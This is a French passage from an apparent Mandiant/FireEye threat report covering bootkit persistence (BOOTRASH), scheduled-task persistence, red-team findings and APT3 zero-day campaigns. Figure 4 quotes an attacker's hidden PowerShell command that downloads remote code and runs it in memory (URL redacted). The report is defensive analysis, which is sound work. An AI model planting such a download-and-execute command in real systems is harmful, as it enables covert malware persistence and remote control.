Exécution en quatre phases Lors de l'installation du bootkit de secteur de démarrage principal, les quatre phases d'exécution décrites ci-dessous surviennent à chaque redémarrage ultérieur :

• 1re phase – Secteur de démarrage principal malveillant : Le BIOS Windows charge le secteur modifié, lequel charge ensuite le code lors de la 2e phase.

• 2e phase – Chargeur initial : Charge le code de la 3e phase, précédemment stocké sous forme de fichier sur le disque et dans des clusters non alloués.

• 3e phase – Chargeur secondaire : Charge le code permettant l'installation et la configuration de la backdoor. Pour s'assurer que la backdoor se charge au démarrage du système d'exploitation, le code de la 3e phase remplace le nom d'un service Windows préexistant par l'emplacement de la backdoor. À la fin de la 3e phase, le contrôle est restitué au secteur de démarrage principal légitime, ce qui permet au système d'exploitation de démarrer.

• 4e phase – Chargeur de la backdoor : Charge la backdoor à partir du disque. Le code de la 4e phase rétablit également le service Windows précédemment détourné à son état d'origine et charge le service légitime comme prévu.

La figure 2 présente de manière simplifiée la séquence de démarrage suivie une fois le bootkit installé.

Bootkit VBR

Partition 0 Système

d'exploitationEspace

non alloué

1

MBR

2

3

4


Bootkit de secteur de démarrage de volumeMandiant a identifié des pirates spécialisés dans les attaques financières ciblées qui se servent d'un bootkit de secteur de démarrage de volume comme mécanisme de persistance. Mandiant l'a baptisé BOOTRASH. À l'instar du bootkit de secteur de démarrage principal, ce bootkit cible les systèmes d'exploitation Windows XP, Windows Server 2003, Windows 7 et Windows Server 2008/2012. Le programme d'installation du bootkit de secteur de démarrage de volume exécute les actions suivantes :

1. Vérification du système – Le programme d'installation collecte des informations sur le système d'exploitation et l'architecture en préparation de l'installation. Il vérifie notamment si un autre programme d'installation est déjà en cours d'exécution et si Microsoft .NET 3.5 Framework est installé, celui-ci étant nécessaire à l'installation de la backdoor.

2. Calcul de l'espace disponible et création d'un système de fichiers virtuel – Le programme d'installation détermine l'espace disponible entre les partitions du disque pour déterminer où créer son propre système de fichiers virtuel, où il stockera les composants de la backdoor.

3. Détournement du secteur de démarrage – Le programme d'installation place une copie de sauvegarde codée du secteur de démarrage de volume sur le disque. Il remplace ensuite le secteur d'origine pour détourner le processus de démarrage aux démarrages suivants du système.

4. Installation des composants de la backdoor – Le programme d'installation place ces composants, chargés de créer et d'installer le bootkit dans le système de fichiers virtuel. D'autres composants de la backdoor peuvent être enregistrés dans le système de fichiers virtuel ou stockés sous forme de données binaires dans le registre Windows. Ils contiennent les fonctions de commande et de contrôle de base.

Une fois le bootkit installé, les redémarrages suivants du système chargent le code malveillant du secteur de démarrage de volume, puis ce code charge la backdoor. La procédure est la suivante :

1. Le secteur de démarrage principal charge le secteur de démarrage de volume malveillant.

2. Ce dernier charge le code de la backdoor à partir du système de fichiers virtuel.

3. Il transmet ensuite le contrôle à la copie du secteur de démarrage de volume légitime, qui poursuit le processus de démarrage.

4. Enfin, le système d'exploitation se charge et la backdoor est opérationnelle.

La figure 3 illustre de manière simplifiée la séquence de démarrage suivie une fois le bootkit installé.

Figure 3 — Schéma simplifié de l'exécution du bootkit de secteur de démarrage de volume

MBR VBR Partition 0Espace

non alloué

21

3 4Bootkit

Système de fichiers virtuel


Enchaînement de techniques de persistance pour éviter la détectionDepuis peu, les attaquants combinent diverses techniques de persistance pour dissimuler leurs activités. Cette approche consiste à scinder l'exécution des malwares en plusieurs phases. L'idée est de donner au premier maillon de la chaîne une apparence anodine, inoffensive et donc légitime aux yeux des experts en investigation. Cependant, en examinant la suite de la chaîne d'exécution pour en reconstituer les différents éléments, l'on obtient une vue d'ensemble avec, tout à la fin, l'exécution du malware. La section suivante décrit l'utilisation par les attaquants de tâches planifiées Windows, première étape de la chaîne qui mène à des méthodes plus sophistiquées d'exécution d'un malware.

Tâches planifiées WindowsIl est possible de planifier et d'automatiser des tâches sur les systèmes à l'aide du Planificateur de tâches Windows. Ce composant observe des critères spécifiques sur le système, par exemple une heure précise ou un événement, tel que le démarrage du système ou une

connexion utilisateur. Lorsque les critères sont satisfaits, le Planificateur de tâches exécute une action prédéfinie. Sa vocation initiale est d'exécuter des tâches administratives journalières, telles que la maintenance du système. Il peut en revanche être détourné pour exécuter des fichiers ou établir une persistance à des fins malveillantes.

De tout temps, les attaquants ont utilisé des tâches planifiées Windows pour des opérations simples, principalement l'exécution ponctuelle de fichiers et le déploiement de malwares persistants. Pour les exécutions ponctuelles, les pirates créent une tâche planifiée Windows conçue pour exécuter en une seule fois un utilitaire ou un programme d'installation de backdoor. Dans le cas d'un malware persistant, la tâche est programmée pour s'exécuter à intervalles prédéfinis (quotidiennement ou certains jours uniquement) afin de s'établir à long terme dans l'environnement.

Ces scénarios d'utilisation permettent aux attaquants d'exécuter le malware de manière récurrente. Plus récemment, nous avons constaté une diversification de l'emploi des

tâches planifiées Windows par ajout de nouveaux maillons dans la chaîne d'exécution. Les attaquants ne se contentent plus de créer une nouvelle tâche pour exécuter des fichiers malveillants : désormais, ils exploitent des utilitaires Windows légitimes pour télécharger et exécuter ces fichiers. Ce type de technique était possible depuis des années mais, soucieux d'agir à couvert, les attaquants accordent aujourd'hui un regain d'attention à la furtivité.

L'une de leurs méthodes consiste à utiliser des commandes PowerShell planifiées pour s'exécuter quotidiennement. Ces commandes sont configurées pour contacter un serveur de commande et de contrôle (CnC) et télécharger du code malveillant, lequel s'implante alors dans la mémoire et s'exécute via un processus PowerShell. À aucun moment, le code malveillant n'est placé sur le disque. Seule trace de l'infection : les arguments de ligne de commande PowerShell configurés dans la tâche planifiée Windows. La figure 4 montre un extrait du fichier de la tâche planifiée Windows contenant le code de configuration nécessaire à l'exécution de PowerShell.

<Actions Context=”Author”>

<Exec>

<Command>powershell</Command>

<Arguments>-w hidden -nologo -noninteractive -nop -ep bypass -c “IEX ((new-object net.webclient).download-

string(“”https://REDACTED”””))”

</Arguments>

</Exec>

</Actions>

Figure 4 — Commande PowerShell contenue dans le fichier d'une tâche planifiée Windows


Cette méthode présente un autre avantage pour l'attaquant : il peut mettre à jour le code malveillant à sa guise puisqu'il est régulièrement extrait du serveur CnC, contacté par le mécanisme de persistance. Dans les cas observés, ce code peut tantôt communiquer avec un serveur CnC différent chaque jour, tantôt rester latent. La figure 5 propose un exemple de cette technique de persistance.

Figure 5 — Tâche planifiée Windows et persistance de PowerShell

Un événement temporel déclenche une tâche planifiée Windows malveillante qui exécute une commande PowerShell.

Les arguments contenus dans la commande PowerShell ordonnent au système de télécharger du code depuis un serveur sous le contrôle de l'attaquant.

Le système de la victime charge le code malveillant en mémoire et l'exécute via un processus Windows PowerShell, sans jamais toucher au disque.

SYSTÈME DE LA VICTIME

SERVEUR DE COMMANDE ET DE CONTRÔLE (CNC) DE L'ATTAQUANT

1.

2.

Ce serveur héberge du code intégrant des fonctionnalités de backdoor, offrant ainsi à l'attaquant un contrôle total sur le système.

3.

4.


Une autre technique observée consistait à utiliser une tâche planifiée Windows configurée pour exécuter un raccourci Windows, à savoir un fichier portant l'extension LNK. À l'aide d'un argument de ligne de commande, le fichier LNK créé ordonnait à PowerShell d'injecter un shellcode dans un processus Windows normalement inoffensif. Dans les cas que nous avons traités, le pirate stockait le shellcode contenant la fonctionnalité backdoor sur le disque. La figure 6 montre un exemple de la méthode d'établissement de la persistance du fichier LNK.

Figure 6 — Tâche planifiée Windows et persistance du fichier LNK

Conclusion

Si l'utilisation des méthodes éprouvées de persistance reste très répandue, les auteurs de malwares ne cessent de mettre au point de nouvelles techniques plus innovantes. Soucieux d'échapper à la détection et de contrer les tentatives d'éradication, ils continuent à s'enfoncer toujours plus profond dans les systèmes, parfois même sous le système d'exploitation. Il est de notre devoir de bien connaître les techniques de persistance des malwares pour mieux guider nos investigations et résoudre efficacement les incidents.

La tâche planifiée Windows s'exécute au démarrage du système. Elle exécute un fichier LNK Windows créé par l'attaquant.

Le fichier LNK est configuré pour exécuter PowerShell. Il contient des arguments de commande indiquant à PowerShell qu'il doit lire un shellcode dans un fichier stocké sur le disque, puis l'injecter dans le processus PowerShell.

SYSTÈME DE LA VICTIME

SERVEUR DE COMMANDE ET DE CONTRÔLE (CNC) DE L'ATTAQUANT

1.

2.

Le shellcode contient du code backdoor qui établit une communication avec le serveur de commande et de contrôle de l'attaquant.

3.

LA RÉSURGENCE DES SIMULATIONS D'ATTAQUE

Introduction

Depuis plusieurs années déjà, les acteurs de la sécurité ont pris conscience de l'importance des tests de sécurité pour l'identification et la neutralisation proactives des vulnérabilités avant qu'un attaquant ne les exploite. Dans les entreprises qui ont missionné Mandiant en 2015, certaines avaient choisi d'exécuter leurs diagnostics de vulnérabilités et leurs tests de sécurité en interne, d'autres avaient confié ces tâches à des entreprises spécialisées, et d'autres encore avaient opté pour

Toutefois, la sécurité parfaite n'étant pas de ce monde, ces écarts ne disparaîtront jamais totalement. En outre, les résultats des diagnostics de sécurité ne sont valables que si l'environnement reste figé, ce qui est totalement irréaliste. Il existera toujours un certain degré d'incertitude. Peu importe leur nombre, les tests des vulnérabilités ne parviendront jamais à deviner les desseins d'un pirate patient et déterminé qui finira toujours par trouver le moyen d'exploiter une faille et de s'infiltrer dans un environnement. Dès lors, au lieu

une formule « mixte ». Ces tests et diagnostics sont généralement constitués d'analyses automatisées d'une part, et d'examens manuels d'autre part, ces derniers étant réalisés par des professionnels qualifiés à l'aide de méthodologies éprouvées. Vient ensuite l'exploitation de vulnérabilités connues, en vue d'apporter une preuve tangible de leur impact potentiel sur une entreprise. Idéalement, chaque test effectué et chaque vulnérabilité corrigée devraient contribuer à combler un peu plus les « écarts de sécurité ».


de se concentrer uniquement sur l'identification et la correction des vulnérabilités, de nombreuses entreprises sont revenues à une bonne vieille méthode très prisée dans les milieux de la défense et des pouvoirs publics : la simulation d'attaque (ou « red teaming »), qui consiste à se placer dans la perspective de l'ennemi.

Mandiant a observé chez ses clients un regain d'intérêt pour les tests ciblés et les simulations visant à reproduire des attaques avancées en conditions réelles. Ces simulations d'attaque vont plus loin que les diagnostics de vulnérabilités et les tests d'intrusion traditionnels pour répondre aux questions suivantes :

1Le dispositif de sécurité protège-t-il efficacement les ressources les plus critiques de l'entreprise (données, systèmes et collaborateurs) ?

2Les équipes de sécurité parviennent-elles à détecter l'activité des menaces ciblées, à déterminer leur gravité et à intervenir de manière efficace pour assurer la protection des ressources critiques ?

3 Quelles sont les failles du dispositif de sécurité qui ont été négligées ou ignorées ?

4 Êtes-vous prêt à faire face à un scénario-catastrophe ?

Dès lors qu'elles sont bien menées, les simulations d'attaque s'imposent comme une composante indispensable qui agit dans le prolongement des méthodes de tests traditionnelles pour renforcer les capacités de détection et d'intervention, de même que pour évaluer et éprouver un dispositif de sécurité.



Quelques définitions

Nous sommes conscients du fait qu'il n'existe pas de définition universelle des termes « diagnostic de vulnérabilités », « test d'intrusion » et « simulation d'attaque ». Certaines entreprises effectuent des tests d'intrusion annuels qui consistent en de simples analyses automatisées des vulnérabilités à l'aide d'outils disponibles dans le commerce. D'autres procèdent régulièrement à des tests d'intrusion qui associent notamment des campagnes d'ingénierie sociale, des malwares personnalisés et des tentatives ciblées de compromission de systèmes métiers critiques.

Notre but n'est pas de nourrir le débat autour des définitions. Pour lever toute ambiguïté, nous proposons toutefois les définitions suivantes dans le contexte des tests de cybersécurité :

Diagnostic de vulnérabilités — Test structuré conçu pour identifier l'intégralité des failles de sécurité d'un système, d'une application ou d'un environnement. Ces diagnostics recourent à des méthodologies de test éprouvées en vue d'identifier toutes les vulnérabilités potentielles et peuvent inclure des tests manuels et automatisés.

Exemple : Bilan technique portant sur l'interface utilisateur, le code compilé, la configuration et les communications réseau des versions iOS et Android d'une application mobile avant sa distribution publique.

Test d'intrusion — Test d'un système, d'une application ou d'un environnement pouvant servir les objectifs d'un attaquant potentiel. Contrairement au diagnostic de vulnérabilités, le test d'intrusion n'envisage pas les vulnérabilités dans leur ensemble, mais vise à identifier des failles précises

servant à exécuter certaines actions, de la même façon que le ferait un attaquant. Il peut inclure des techniques manuelles et automatisées, mais nécessite l'intervention d'une personne en qualité de testeur chargé de s'engouffrer dans les failles exploitables et ainsi atteindre l'objectif final.

Exemple : Diagnostic des menaces internes d'une société biomédicale pour laquelle Mandiant avait reçu un accès intranet et la mission d'accéder aux e-mails des dirigeants, aux données R&D et à des informations médicales personnelles.

Les tests d'intrusion ajoutent une dimension humaine.

Simulation d'attaque — Reproduction d'une attaque faisant appel à la précision, à la créativité et aux outils, tactiques et procédures d'un pirate aguerri et motivé, le but étant d'atteindre un objectif pertinent au sein de l'environnement ciblé. Généralement réalisée à l'insu des équipes informatiques et de sécurité, la simulation d'attaque consiste à élaborer un scénario réaliste fondé sur les menaces émergentes afin d'identifier les failles de sécurité et d'évaluer la capacité d'une entreprise à détecter et neutraliser des menaces APT.

Exemple : Le directeur des systèmes d'information (DSI) d'une grande entreprise industrielle a fait appel à Mandiant par l'intermédiaire d'un tiers. La mission de Mandiant ? Infiltrer l'entreprise et dérober des données critiques. À cette fin, tous les angles d'attaque ont été envisagés, notamment l'ingénierie sociale, des compromissions physiques et même des intrusions dans le siège social et d'autres filiales. En dehors du DSI lui-même, personne au sein de l'entreprise n'était au courant de la simulation et tous les tests devaient être réalisés depuis une infrastructure anonyme.

Mandiant a également reçu pour instruction de laisser des traces sur les systèmes compromis afin d'évaluer l'efficacité des équipes d'intervention en termes de détection, de suivi et d'investigation de l'attaque.

Les missions de simulation offrent de nombreux avantages : reproduction exacte des attaques avancées, identification des vulnérabilités inconnues et formation du personnel dans un scénario d'attaque entièrement maîtrisé.

Ces diagnostics aident les entreprises à déceler des problèmes connus au sein de leur environnement.


On ne soulignera jamais assez le fait que les tests d'intrusion, les simulations d'attaque et les diagnostics de vulnérabilités apportent une valeur ajoutée considérable qui les rend incontournables pour l'efficacité d'un dispositif de sécurité. Bon nombre des outils et techniques de simulation d'attaque sont également employés pour les diagnostics de vulnérabilités et les tests d'intrusion. Chaque type de test fournit des informations pertinentes et exploitables qui pourront ensuite être utilisées pour réduire le risque de cybermenaces.

La simulation d'attaque se distingue essentiellement des deux autres catégories par la perspective unique qu'elle offre sur l'état de préparation et la résilience aux attaques d'une entreprise. En plus d'identifier les failles de sécurité critiques au niveau des différents rideaux défensifs, elle aide les entreprises à renforcer leurs capacités de détection et d'intervention (autrement dit, à défendre leur environnement) en soumettant leur dispositif de sécurité à un scénario d'attaque réaliste et pertinent.

Les simulations aident en outre les entreprises à optimiser leurs défenses en soumettant leur dispositif de sécurité à un scénario d'attaque réaliste et pertinent.

Dans son intervention très remarquée à l'occasion de la conférence Enigma d'USENIX en 20165, Rob Joyce, directeur de l'équipe de piratage d'élite (TAO) de la NSA, s'est exprimé en ces termes à propos des opérations de reconnaissance menées par ses services de renseignement à l'encontre de réseaux cibles : « Vous (le défenseur) savez quelles technologies vous comptiez utiliser au sein de ce réseau. Nous (l'attaquant) connaissons celles qui sont réellement en place. » Pour lui, il est essentiel de connaître son environnement, tout comme il est important de recourir à des simulations pour bien déterminer la surface d'attaque de l'entreprise et appréhender son environnement sous l'angle de vue d'un attaquant. Nombreuses sont les entreprises qui ont pris conscience du caractère indispensable de ce type de tests ciblés, et qui y recourent de plus en plus souvent en complément des diagnostics de vulnérabilités et des tests d'intrusion traditionnels.

5 Conférence Enigma 2016 d'USENIX – Directeur de l'équipe TAO de la NSA – Comment démasquer des pirates agissant pour le compte d'un État – https://youtu.be/bDJb8WOJYdA

https://youtu.be/bDJb8WOJYdA


Observation n° 1 – Les identifiants, de manière généraleLa capture d'identifiants demeure la méthode la plus efficace pour compromettre une entreprise sans se faire repérer. Parmi nos principales constatations :

• De nombreuses entreprises n'ont toujours pas résolu le problème des mots de passe. En bref, elles peinent encore à obliger leur personnel à utiliser des mots de passe suffisamment complexes et difficiles à deviner. Les recherches et les statistiques sont nombreuses dans ce domaine6, et les problèmes liés à la gestion des mots de passe utilisateurs sont connus de longue date. Diverses solutions au problème des identifiants s'offrent aux entreprises aujourd'hui, depuis les coffres-forts de mots de passe à l'authentification multifacteur, en passant par la signature unique (SSO). Pourtant, les mots de passe demeurent un problème systémique pour la plupart de nos clients, de sorte qu'il nous est impossible de ne pas aborder le sujet à l'heure de traiter la question des attaques.

Qui plus est, le problème ne se limite pas aux simples utilisateurs. Administrateurs système, développeurs, administrateurs de bases de données, administrateurs de domaines et même professionnels de la sécurité représentent un facteur de risque pour leur propre entreprise. Alors qu'ils devraient se montrer plus avertis du fait de leur statut de cibles privilégiées, ils figurent parmi les pires contrevenants en termes de choix de mots de passe faibles ou de non-respect de la politique en place à cet égard.

Défaillance de la sécurité : les tendances 2015

Nous soulignons ci-dessous quelques problèmes fondamentaux identifiés régulièrement lors de tests ciblés effectués à l'insu de l'entreprise cible (hormis un nombre limité d'acteurs impliqués) – tests pour lesquels nos spécialistes avaient carte blanche pour mener l'attaque à l'aide des outils, tactiques et procédures déployés par des pirates aguerris.

Les observations suivantes n'ont pas pour objet de fournir une liste exhaustive ni d'établir un classement des vulnérabilités de sécurité qui continuent de frapper durement les entreprises. Identifiants par défaut, correctifs manquants, procédures déficientes de validation des saisies, systèmes d'exploitation obsolètes et autres problèmes récurrents dans les rapports de vulnérabilité… c'est le tableau auquel nous sommes constamment confrontés, tout comme les éditeurs de logiciels de sécurité et les équipes de test interne.

En tant que membre de l'équipe informatique ou de sécurité, n'oubliez jamais que les attaquants vous ont dans le viseur et n'ont qu'une idée en tête : mettre la main sur vos identifiants. Évitez de leur faciliter la tâche avec une politique de mots de passe trop laxiste.

• Les identifiants demeurent un problème majeur dans le cache mémoire. Outre les outils d'extraction de mots de passe bien connus déjà en circulation, le détournement de PowerShell et de WMI a conduit à l'émergence de nombreux kits d'outils grâce auxquels le ciblage d'utilisateurs « à forte valeur » et la collecte d'identifiants en mémoire sont devenus une simple formalité. Outre leur disponibilité et leur excellente compatibilité, ces outils performants échappent pour la plupart aux antivirus. Les consignes détaillées de Microsoft en matière de protection des informations d'identification7 et les mesures de sécurité intégrées aux systèmes d'exploitation Windows récents n'y changent rien : nos simulations d'attaque n'ont aucun mal à extraire des identifiants de la mémoire qui serviront ensuite à se déplacer latéralement sur le réseau.

• Authentification à un seul facteur. Cette faille structurelle est une problématique ancienne pour laquelle des solutions existent. Pourtant, des entreprises continuent d'exposer à Internet leur architecture OWA, leurs systèmes Citrix et SAP, et même leur réseau VPN via des pages de connexion à un seul facteur (et souvent intégrées à Active Directory).

6 Exemple : https://blog.netspi.com/netspis-top-password-masks-for-2015/7 Gestion et protection des informations d'identification – https://technet.microsoft.com/fr-fr/library/dn408190.aspx


Mener une campagne d'ingénierie sociale pour amener des utilisateurs à « s'authentifier » sur un site malveillant avec leurs identifiants Active Directory n'a rien de compliqué. Cette méthode offre en outre aux attaquants déjà implantés dans l'environnement une voie d'accès alternative quasiment indifférenciable de l'activité utilisateur normale.

Observation n° 2 – Incapacité à détecter des attaques ciblées ou à distinguer les activités banales des menaces réellesLorsque le test s'est fait à l'insu de l'entreprise (« connaissance zéro »), nos missions ciblées ont permis de démontrer l'incapacité latente des équipes IT et de sécurité à repérer certains indices essentiels d'une attaque en cours. D'après notre expérience, cette situation est imputable tant au personnel qu'aux processus et aux technologies. En effet, la plupart des entreprises ne dotent pas leurs équipes de détection de personnel suffisant et d'outils efficaces, et ne leur assurent pas les formations et les moyens d'action nécessaires. Dès lors, les responsables de leur défense ne sont pas armés pour contrer des attaques réelles, laissant à leurs auteurs le champ libre pour agir ni vu ni connu.

Voici quelques exemples :

• Bien que de nombreux produits de protection des terminaux soient à même de détecter les outils d'attaque courants (extraction de mots de passe, administration à distance, shells Web, etc.), les alertes générées lors du test sont souvent ignorées ou mal priorisées. Lorsque nous avons généré intentionnellement une alerte antivirus associée à un malware d'extraction d'identifiants (par exemple, Mimikatz), moins de 10 % des entreprises ont identifié l'alerte comme le signe d'une activité malveillante en cours et l'ont traitée comme telle. Dans la plupart des cas, l'équipe de sécurité s'est contentée de laisser l'antivirus mettre le malware en quarantaine sans pousser les investigations plus avant.

• De la même façon, les dispositifs de surveillance du périmètre peinent à faire la différence entre une opération de reconnaissance et d'exploitation en cours et les éléments parasites habituels dans les alertes. Si les analyseurs de ports, les outils d'attaque par force brute et d'autres techniques « bruyantes » sont repérés, les attaques manuelles (en particulier contre des applications Web) continuent pour la plupart de passer inaperçues. Durant

la plupart des tests menés par Mandiant en 2015, les entreprises qui n'étaient pas au courant de ceux-ci se sont révélées incapables de détecter les attaques visant leur périmètre, y compris celles dont les défenses périmétriques ont été percées et compromises.

• Elles ont tout simplement fait l'impasse sur des indicateurs de compromission des systèmes internes critiques, y compris des contrôles de sécurité. En 2015, Mandiant a travaillé au contact de nombreuses entreprises équipées de contrôles de sécurité conformes aux meilleures pratiques (coffres-forts de mots de passe, authentification à deux facteurs, cryptage des données, solution SIEM, etc.). Paradoxalement, les tentatives d'accès et l'activité d'administration sur ces dispositifs ne faisaient l'objet d'aucune surveillance ! Ils constituent pourtant une cible de choix compte tenu des privilèges élevés qui leur sont associés et de leur importance pour la sécurité de l'entreprise. Nos simulations d'attaque exploitent souvent des infrastructures de sécurité compromises pour mener des opérations de reconnaissance et obtenir des droits d'accès supplémentaires, ou encore épier les activités de l'équipe de sécurité. À défaut de surveillance des tentatives d'accès et de l'activité d'administration sur leurs dispositifs de sécurité, les entreprises passent à côté d'indices révélateurs d'une attaque ciblée en cours.

Cette méconnaissance de la situation ne se limite pas aux seuls dispositifs de sécurité. De nombreuses entreprises ne surveillent pas les tentatives d'accès à des ressources internes critiques. Lors d'une simulation d'attaque dans une entreprise pourtant très bien protégée, Mandiant est parvenu à compromettre le portail intranet et à y installer un malware conçu pour mener des attaques d'ingénierie sociale contre des unités opérationnelles à sécurité renforcée. L'identification et l'exploitation des vulnérabilités du portail ont pris plusieurs jours. Une fois sa présence établie via un shell Web, Mandiant a tenté sans succès d'obtenir des privilèges élevés sur le serveur. Ces tentatives d'exploitation ont généré plusieurs entrées dans les journaux et des alertes antivirus. Toutes sont pourtant passées inaperçues et n'ont suscité aucune réaction. D'après les observations de Mandiant lors de tests d'intrusion ciblés et de simulations d'attaque, il est fréquent que les alertes de sécurité internes soient négligées.


Observation n° 3 – Contrôles inadéquats en sortiePresque toutes les entreprises investissent du temps et de l'argent dans le renforcement de la sécurité du périmètre en vue de refouler le plus possible les attaques entrantes. Par contre, la limitation du trafic en sortie ne semble pas faire partie des priorités en matière de sécurité. Or, le manque de contrôles en sortie permet à des malwares, des utilisateurs internes malveillants et autre attaquants d'établir facilement des connexions à distance avec des hôtes Internet non approuvés, et ainsi prendre les commandes et le contrôle de l'environnement pour en exfiltrer des données.

• Non-utilisation des contrôles en sortie en place — Si les entreprises n'hésitent pas à investir dans de nouveaux outils de protection des terminaux (prévention des fuites de données, protection de la messagerie, surveillance du réseau, etc.), beaucoup ne tiennent pas compte des fonctionnalités existantes au sein de leur infrastructure réseau et des contrôles du périmètre mis en place pour bloquer le trafic inutile en sortie. Il n'est pas rare de constater une absence complète de filtres sur des connexions sortantes vers des hôtes externes non approuvés, via des protocoles tels que SSH, RDP et DNS. S'il est clair qu'en comparaison avec le déploiement de nouvelles technologies, la fermeture des connexions sortantes existantes constitue un véritable casse-tête pour les entreprises, l'écriture de règles de pare-feu ne coûte en revanche pas très cher.

• Incapacité à détecter le trafic sortant malveillant et le vol de données — Presque toutes les simulations d'attaque incluent des tentatives de connexions sortantes avec des systèmes externes non approuvés, généralement dans le but de feindre une exfiltration de données. Lors de nos missions, seules quelques équipes de sécurité internes sont parvenues à détecter les activités de commande et de contrôle ou de vol de données en sortie. Et même lorsque les connexions sortantes sont bloquées par des règles ou des filtres de contenu Web, ces événements ne génèrent le plus souvent aucune alerte et, lorsqu'ils le font, ces alertes sont ignorées. L'attaquant a ainsi tout le loisir de trouver des voies de sortie alternatives.

Scénario d'utilisation — Mandiant a lancé une simulation d'attaque à l'encontre d'un client affirmant disposer d'une solution DLP performante. L'un des principaux objectifs de cette mission était de déterminer si l'équipe de sécurité interne parviendrait à détecter un vol de données. À cette fin, nous nous sommes dans un premier temps connectés à un contrôleur de domaine principal, dont le serveur était manifestement en mesure de communiquer directement avec Internet. Nous avons ensuite transféré un volume conséquent de numéros de sécurité sociale depuis ce contrôleur vers un site Web externe non approuvé au moyen d'une connexion HTTP non cryptée.

À la réception des résultats, le client s'est montré sceptique, avançant l'argument selon lequel des numéros de sécurité sociale ne peuvent pas à eux seuls déclencher l'intervention de la solution DLP. Nous avons donc ajouté le nom, l'adresse, le numéro de téléphone et le numéro de carte crédit associés à chaque numéro de sécurité sociale. Avec la même procédure de transfert, nous sommes parvenus à extraire toutes ces données de façon totalement inaperçue.

Nous ignorons pourquoi la solution DLP n'a pas pu détecter l'exfiltration d'informations sensibles non cryptées dans ce cas précis. D'après notre expérience, ce type de lacune n'est pourtant pas rare et souligne l'importance de confronter les contrôles de sécurité à une activité d'attaque réaliste.


Conclusion

Notre but n'est pas de descendre en flammes les éditeurs de logiciels de sécurité, ni de critiquer des équipes informatiques submergées par la lourde tâche que représentent la gestion et la protection d'une entreprise, souvent encore compliquée par le manque de personnel, de temps et d'argent. Nous sommes conscients du fait que gérer tout un dispositif de sécurité est difficile et que corriger les vulnérabilités connues est souvent coûteux et chronophage. En outre, de nombreuses entreprises n'ont pas les moyens d'investir dans une détection et une neutralisation efficaces des attaques ciblées.

Pour celles qui sont conscientes de l'existence de failles majeures dans leur dispositif de sécurité, nous ne recommandons pas toujours une simulation d'attaque de grande envergure. L'accent doit avant tout être mis sur le renforcement de ce dispositif, la formation et la sensibilisation des utilisateurs, ainsi que la protection de l'infrastructure et des ressources critiques. La raison est simple : il est parfaitement inutile d'évaluer la sécurité d'un élément de l'environnement connu pour être non sécurisé. Dans le cas des clients qui ne sont pas prêts à se mesurer à un attaquant en conditions réelles, il peut être plus judicieux de réaliser des diagnostics de vulnérabilités et des tests d'intrusion plus ciblés sur des systèmes et applications stratégiques.

Nous continuons cependant à enregistrer une hausse de la demande de diagnostics ciblés avec simulation d'attaques avancées, en particulier de la part d'entreprises dotées d'un dispositif de sécurité mature et qui perçoivent la sécurité comme un processus en constante évolution qu'il convient de réévaluer régulièrement. Ces entreprises effectuent donc des simulations d'attaques ciblées annuelles ou semestrielles en complément de leur programme de gestion des vulnérabilités, le but étant de mettre à l'épreuve leurs contrôles de sécurité et leurs capacités de détection et d'intervention. Se confronter à une attaque réaliste permet de se projeter au-delà de la question « Mon entreprise est-elle protégée ? » pour répondre à celle-ci : « Est-elle prête ? ».


FaaS DÉTECTION DES ATTAQUANTS ET INTERVENTION EN TEMPS RÉEL ET À GRANDE ÉCHELLE


Avec plus de 200 clients et 4 millions d'hôtes sous leur responsabilité, les services de détection FireEye as a Service (FaaS) sont régulièrement amenés à traiter simultanément des dizaines d'événements actifs. Notre cœur de mission ? Neutraliser les menaces persistantes avancées (APT) et les cybercriminels les plus redoutables. Cette tâche est souvent compliquée par le fait que plusieurs groupes APT peuvent agir simultanément, ainsi que par l'existence de différents problèmes fondamentaux.

Si la détection des menaces sur un hôte individuel ou un environnement client donné a toujours été difficile, l'exécution de ces activités avec la vitesse requise et à l'échelle de tous les déploiements représente une toute autre gageure. Pour y parvenir, FaaS combine une cyberveille avancée, des technologies multiniveaux et six centres de détection avancés pour assurer la protection des clients 24 heures sur 24, 365 jours par an.

Sur 30 jours d'activité normale, FaaS a ainsi identifié deux campagnes zero-day lancées par différents groupes à la solde du gouvernement chinois, une intrusion dans un cabinet d'avocats par des pirates russes soupçonnés d'entretenir des liens avec Moscou, ainsi qu'une intrusion d'origine chinoise chez un industriel.

En juin 2015, FaaS a identifié une attaque par spear phishing émanant d'APT3 à l'encontre de plusieurs clients. D'après FireEye Threat Intelligence, derrière la dénomination APT3 se cacherait un groupe de pirates chinois extrêmement qualifiés et travaillant pour les autorités de Pékin. En l'espace de 24 heures, FireEye a établi que les e-mails contenaient un exploit zero-day ciblant Adobe Flash. En trois semaines, APT3 a pris pour cible pas moins de 14 clients FaaS avec cet exploit zero-day et une série d'autres outils malveillants.

Opérationnel 24 h/7j, le dispositif de détection de FaaS nous a permis de garder une longueur d'avance sur APT3 tout au long de cette campagne, de collaborer avec Adobe à l'élaboration d'un correctif, de communiquer des informations à d'autres éditeurs de solutions de sécurité et de fournir de manière proactive des informations sur la campagne à l'ensemble des clients FaaS. Grâce à sa collaboration avec l'équipe FireEye Threat Intelligence, FaaS a pu identifier 20 autres clients précédemment ciblés par APT3, leur assurer une détection proactive avancée et distribuer à l'ensemble de ses clients des indicateurs pour APT3. Cinq de ces 20 clients ont été ciblés dans les semaines qui ont suivi, et les notifications et actions avancées ont permis de neutraliser APT3. FireEye a baptisé cette opération Clandestine Wolf8.

Jours 0-11 : Utilisation par APT3 d'un exploit zero-day

Jours 9-14 : Compromission par APT19

Jours 17-27 : Utilisation d'un exploit zero-day contre Hacking Team par APT3 et APT18

Jours 19-30 : Compromission par APT29

Jours 0-30 : FaaS a traité 11 événements de compromission et envoyé 325 alertes à ses clients, dont 169 concernaient des menaces APT.

8 Erica Eng et Dan Caselden, « Operation Clandestine Wolf—Adobe Flash Zero-Day in APT3 Phishing Campaign », 23 juin 2015, FireEye, https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html


Dans la semaine qui a suivi l'apparition de Clandestine Wolf, FaaS a constaté qu'APT3 et un autre groupe d'attaquants chinois, connu sous le nom d'APT18, ciblaient 18 de ses clients au moyen d'un deuxième exploit zero-day d'Adobe Flash. APT3 et APT18 ont découvert cette vulnérabilité zero-day après que des pirates, dont le nom n'a pas été dévoilé, ont compromis Hacking Team, un éditeur italien de logiciels d'intrusion, et divulgué leurs exploits en ligne9.

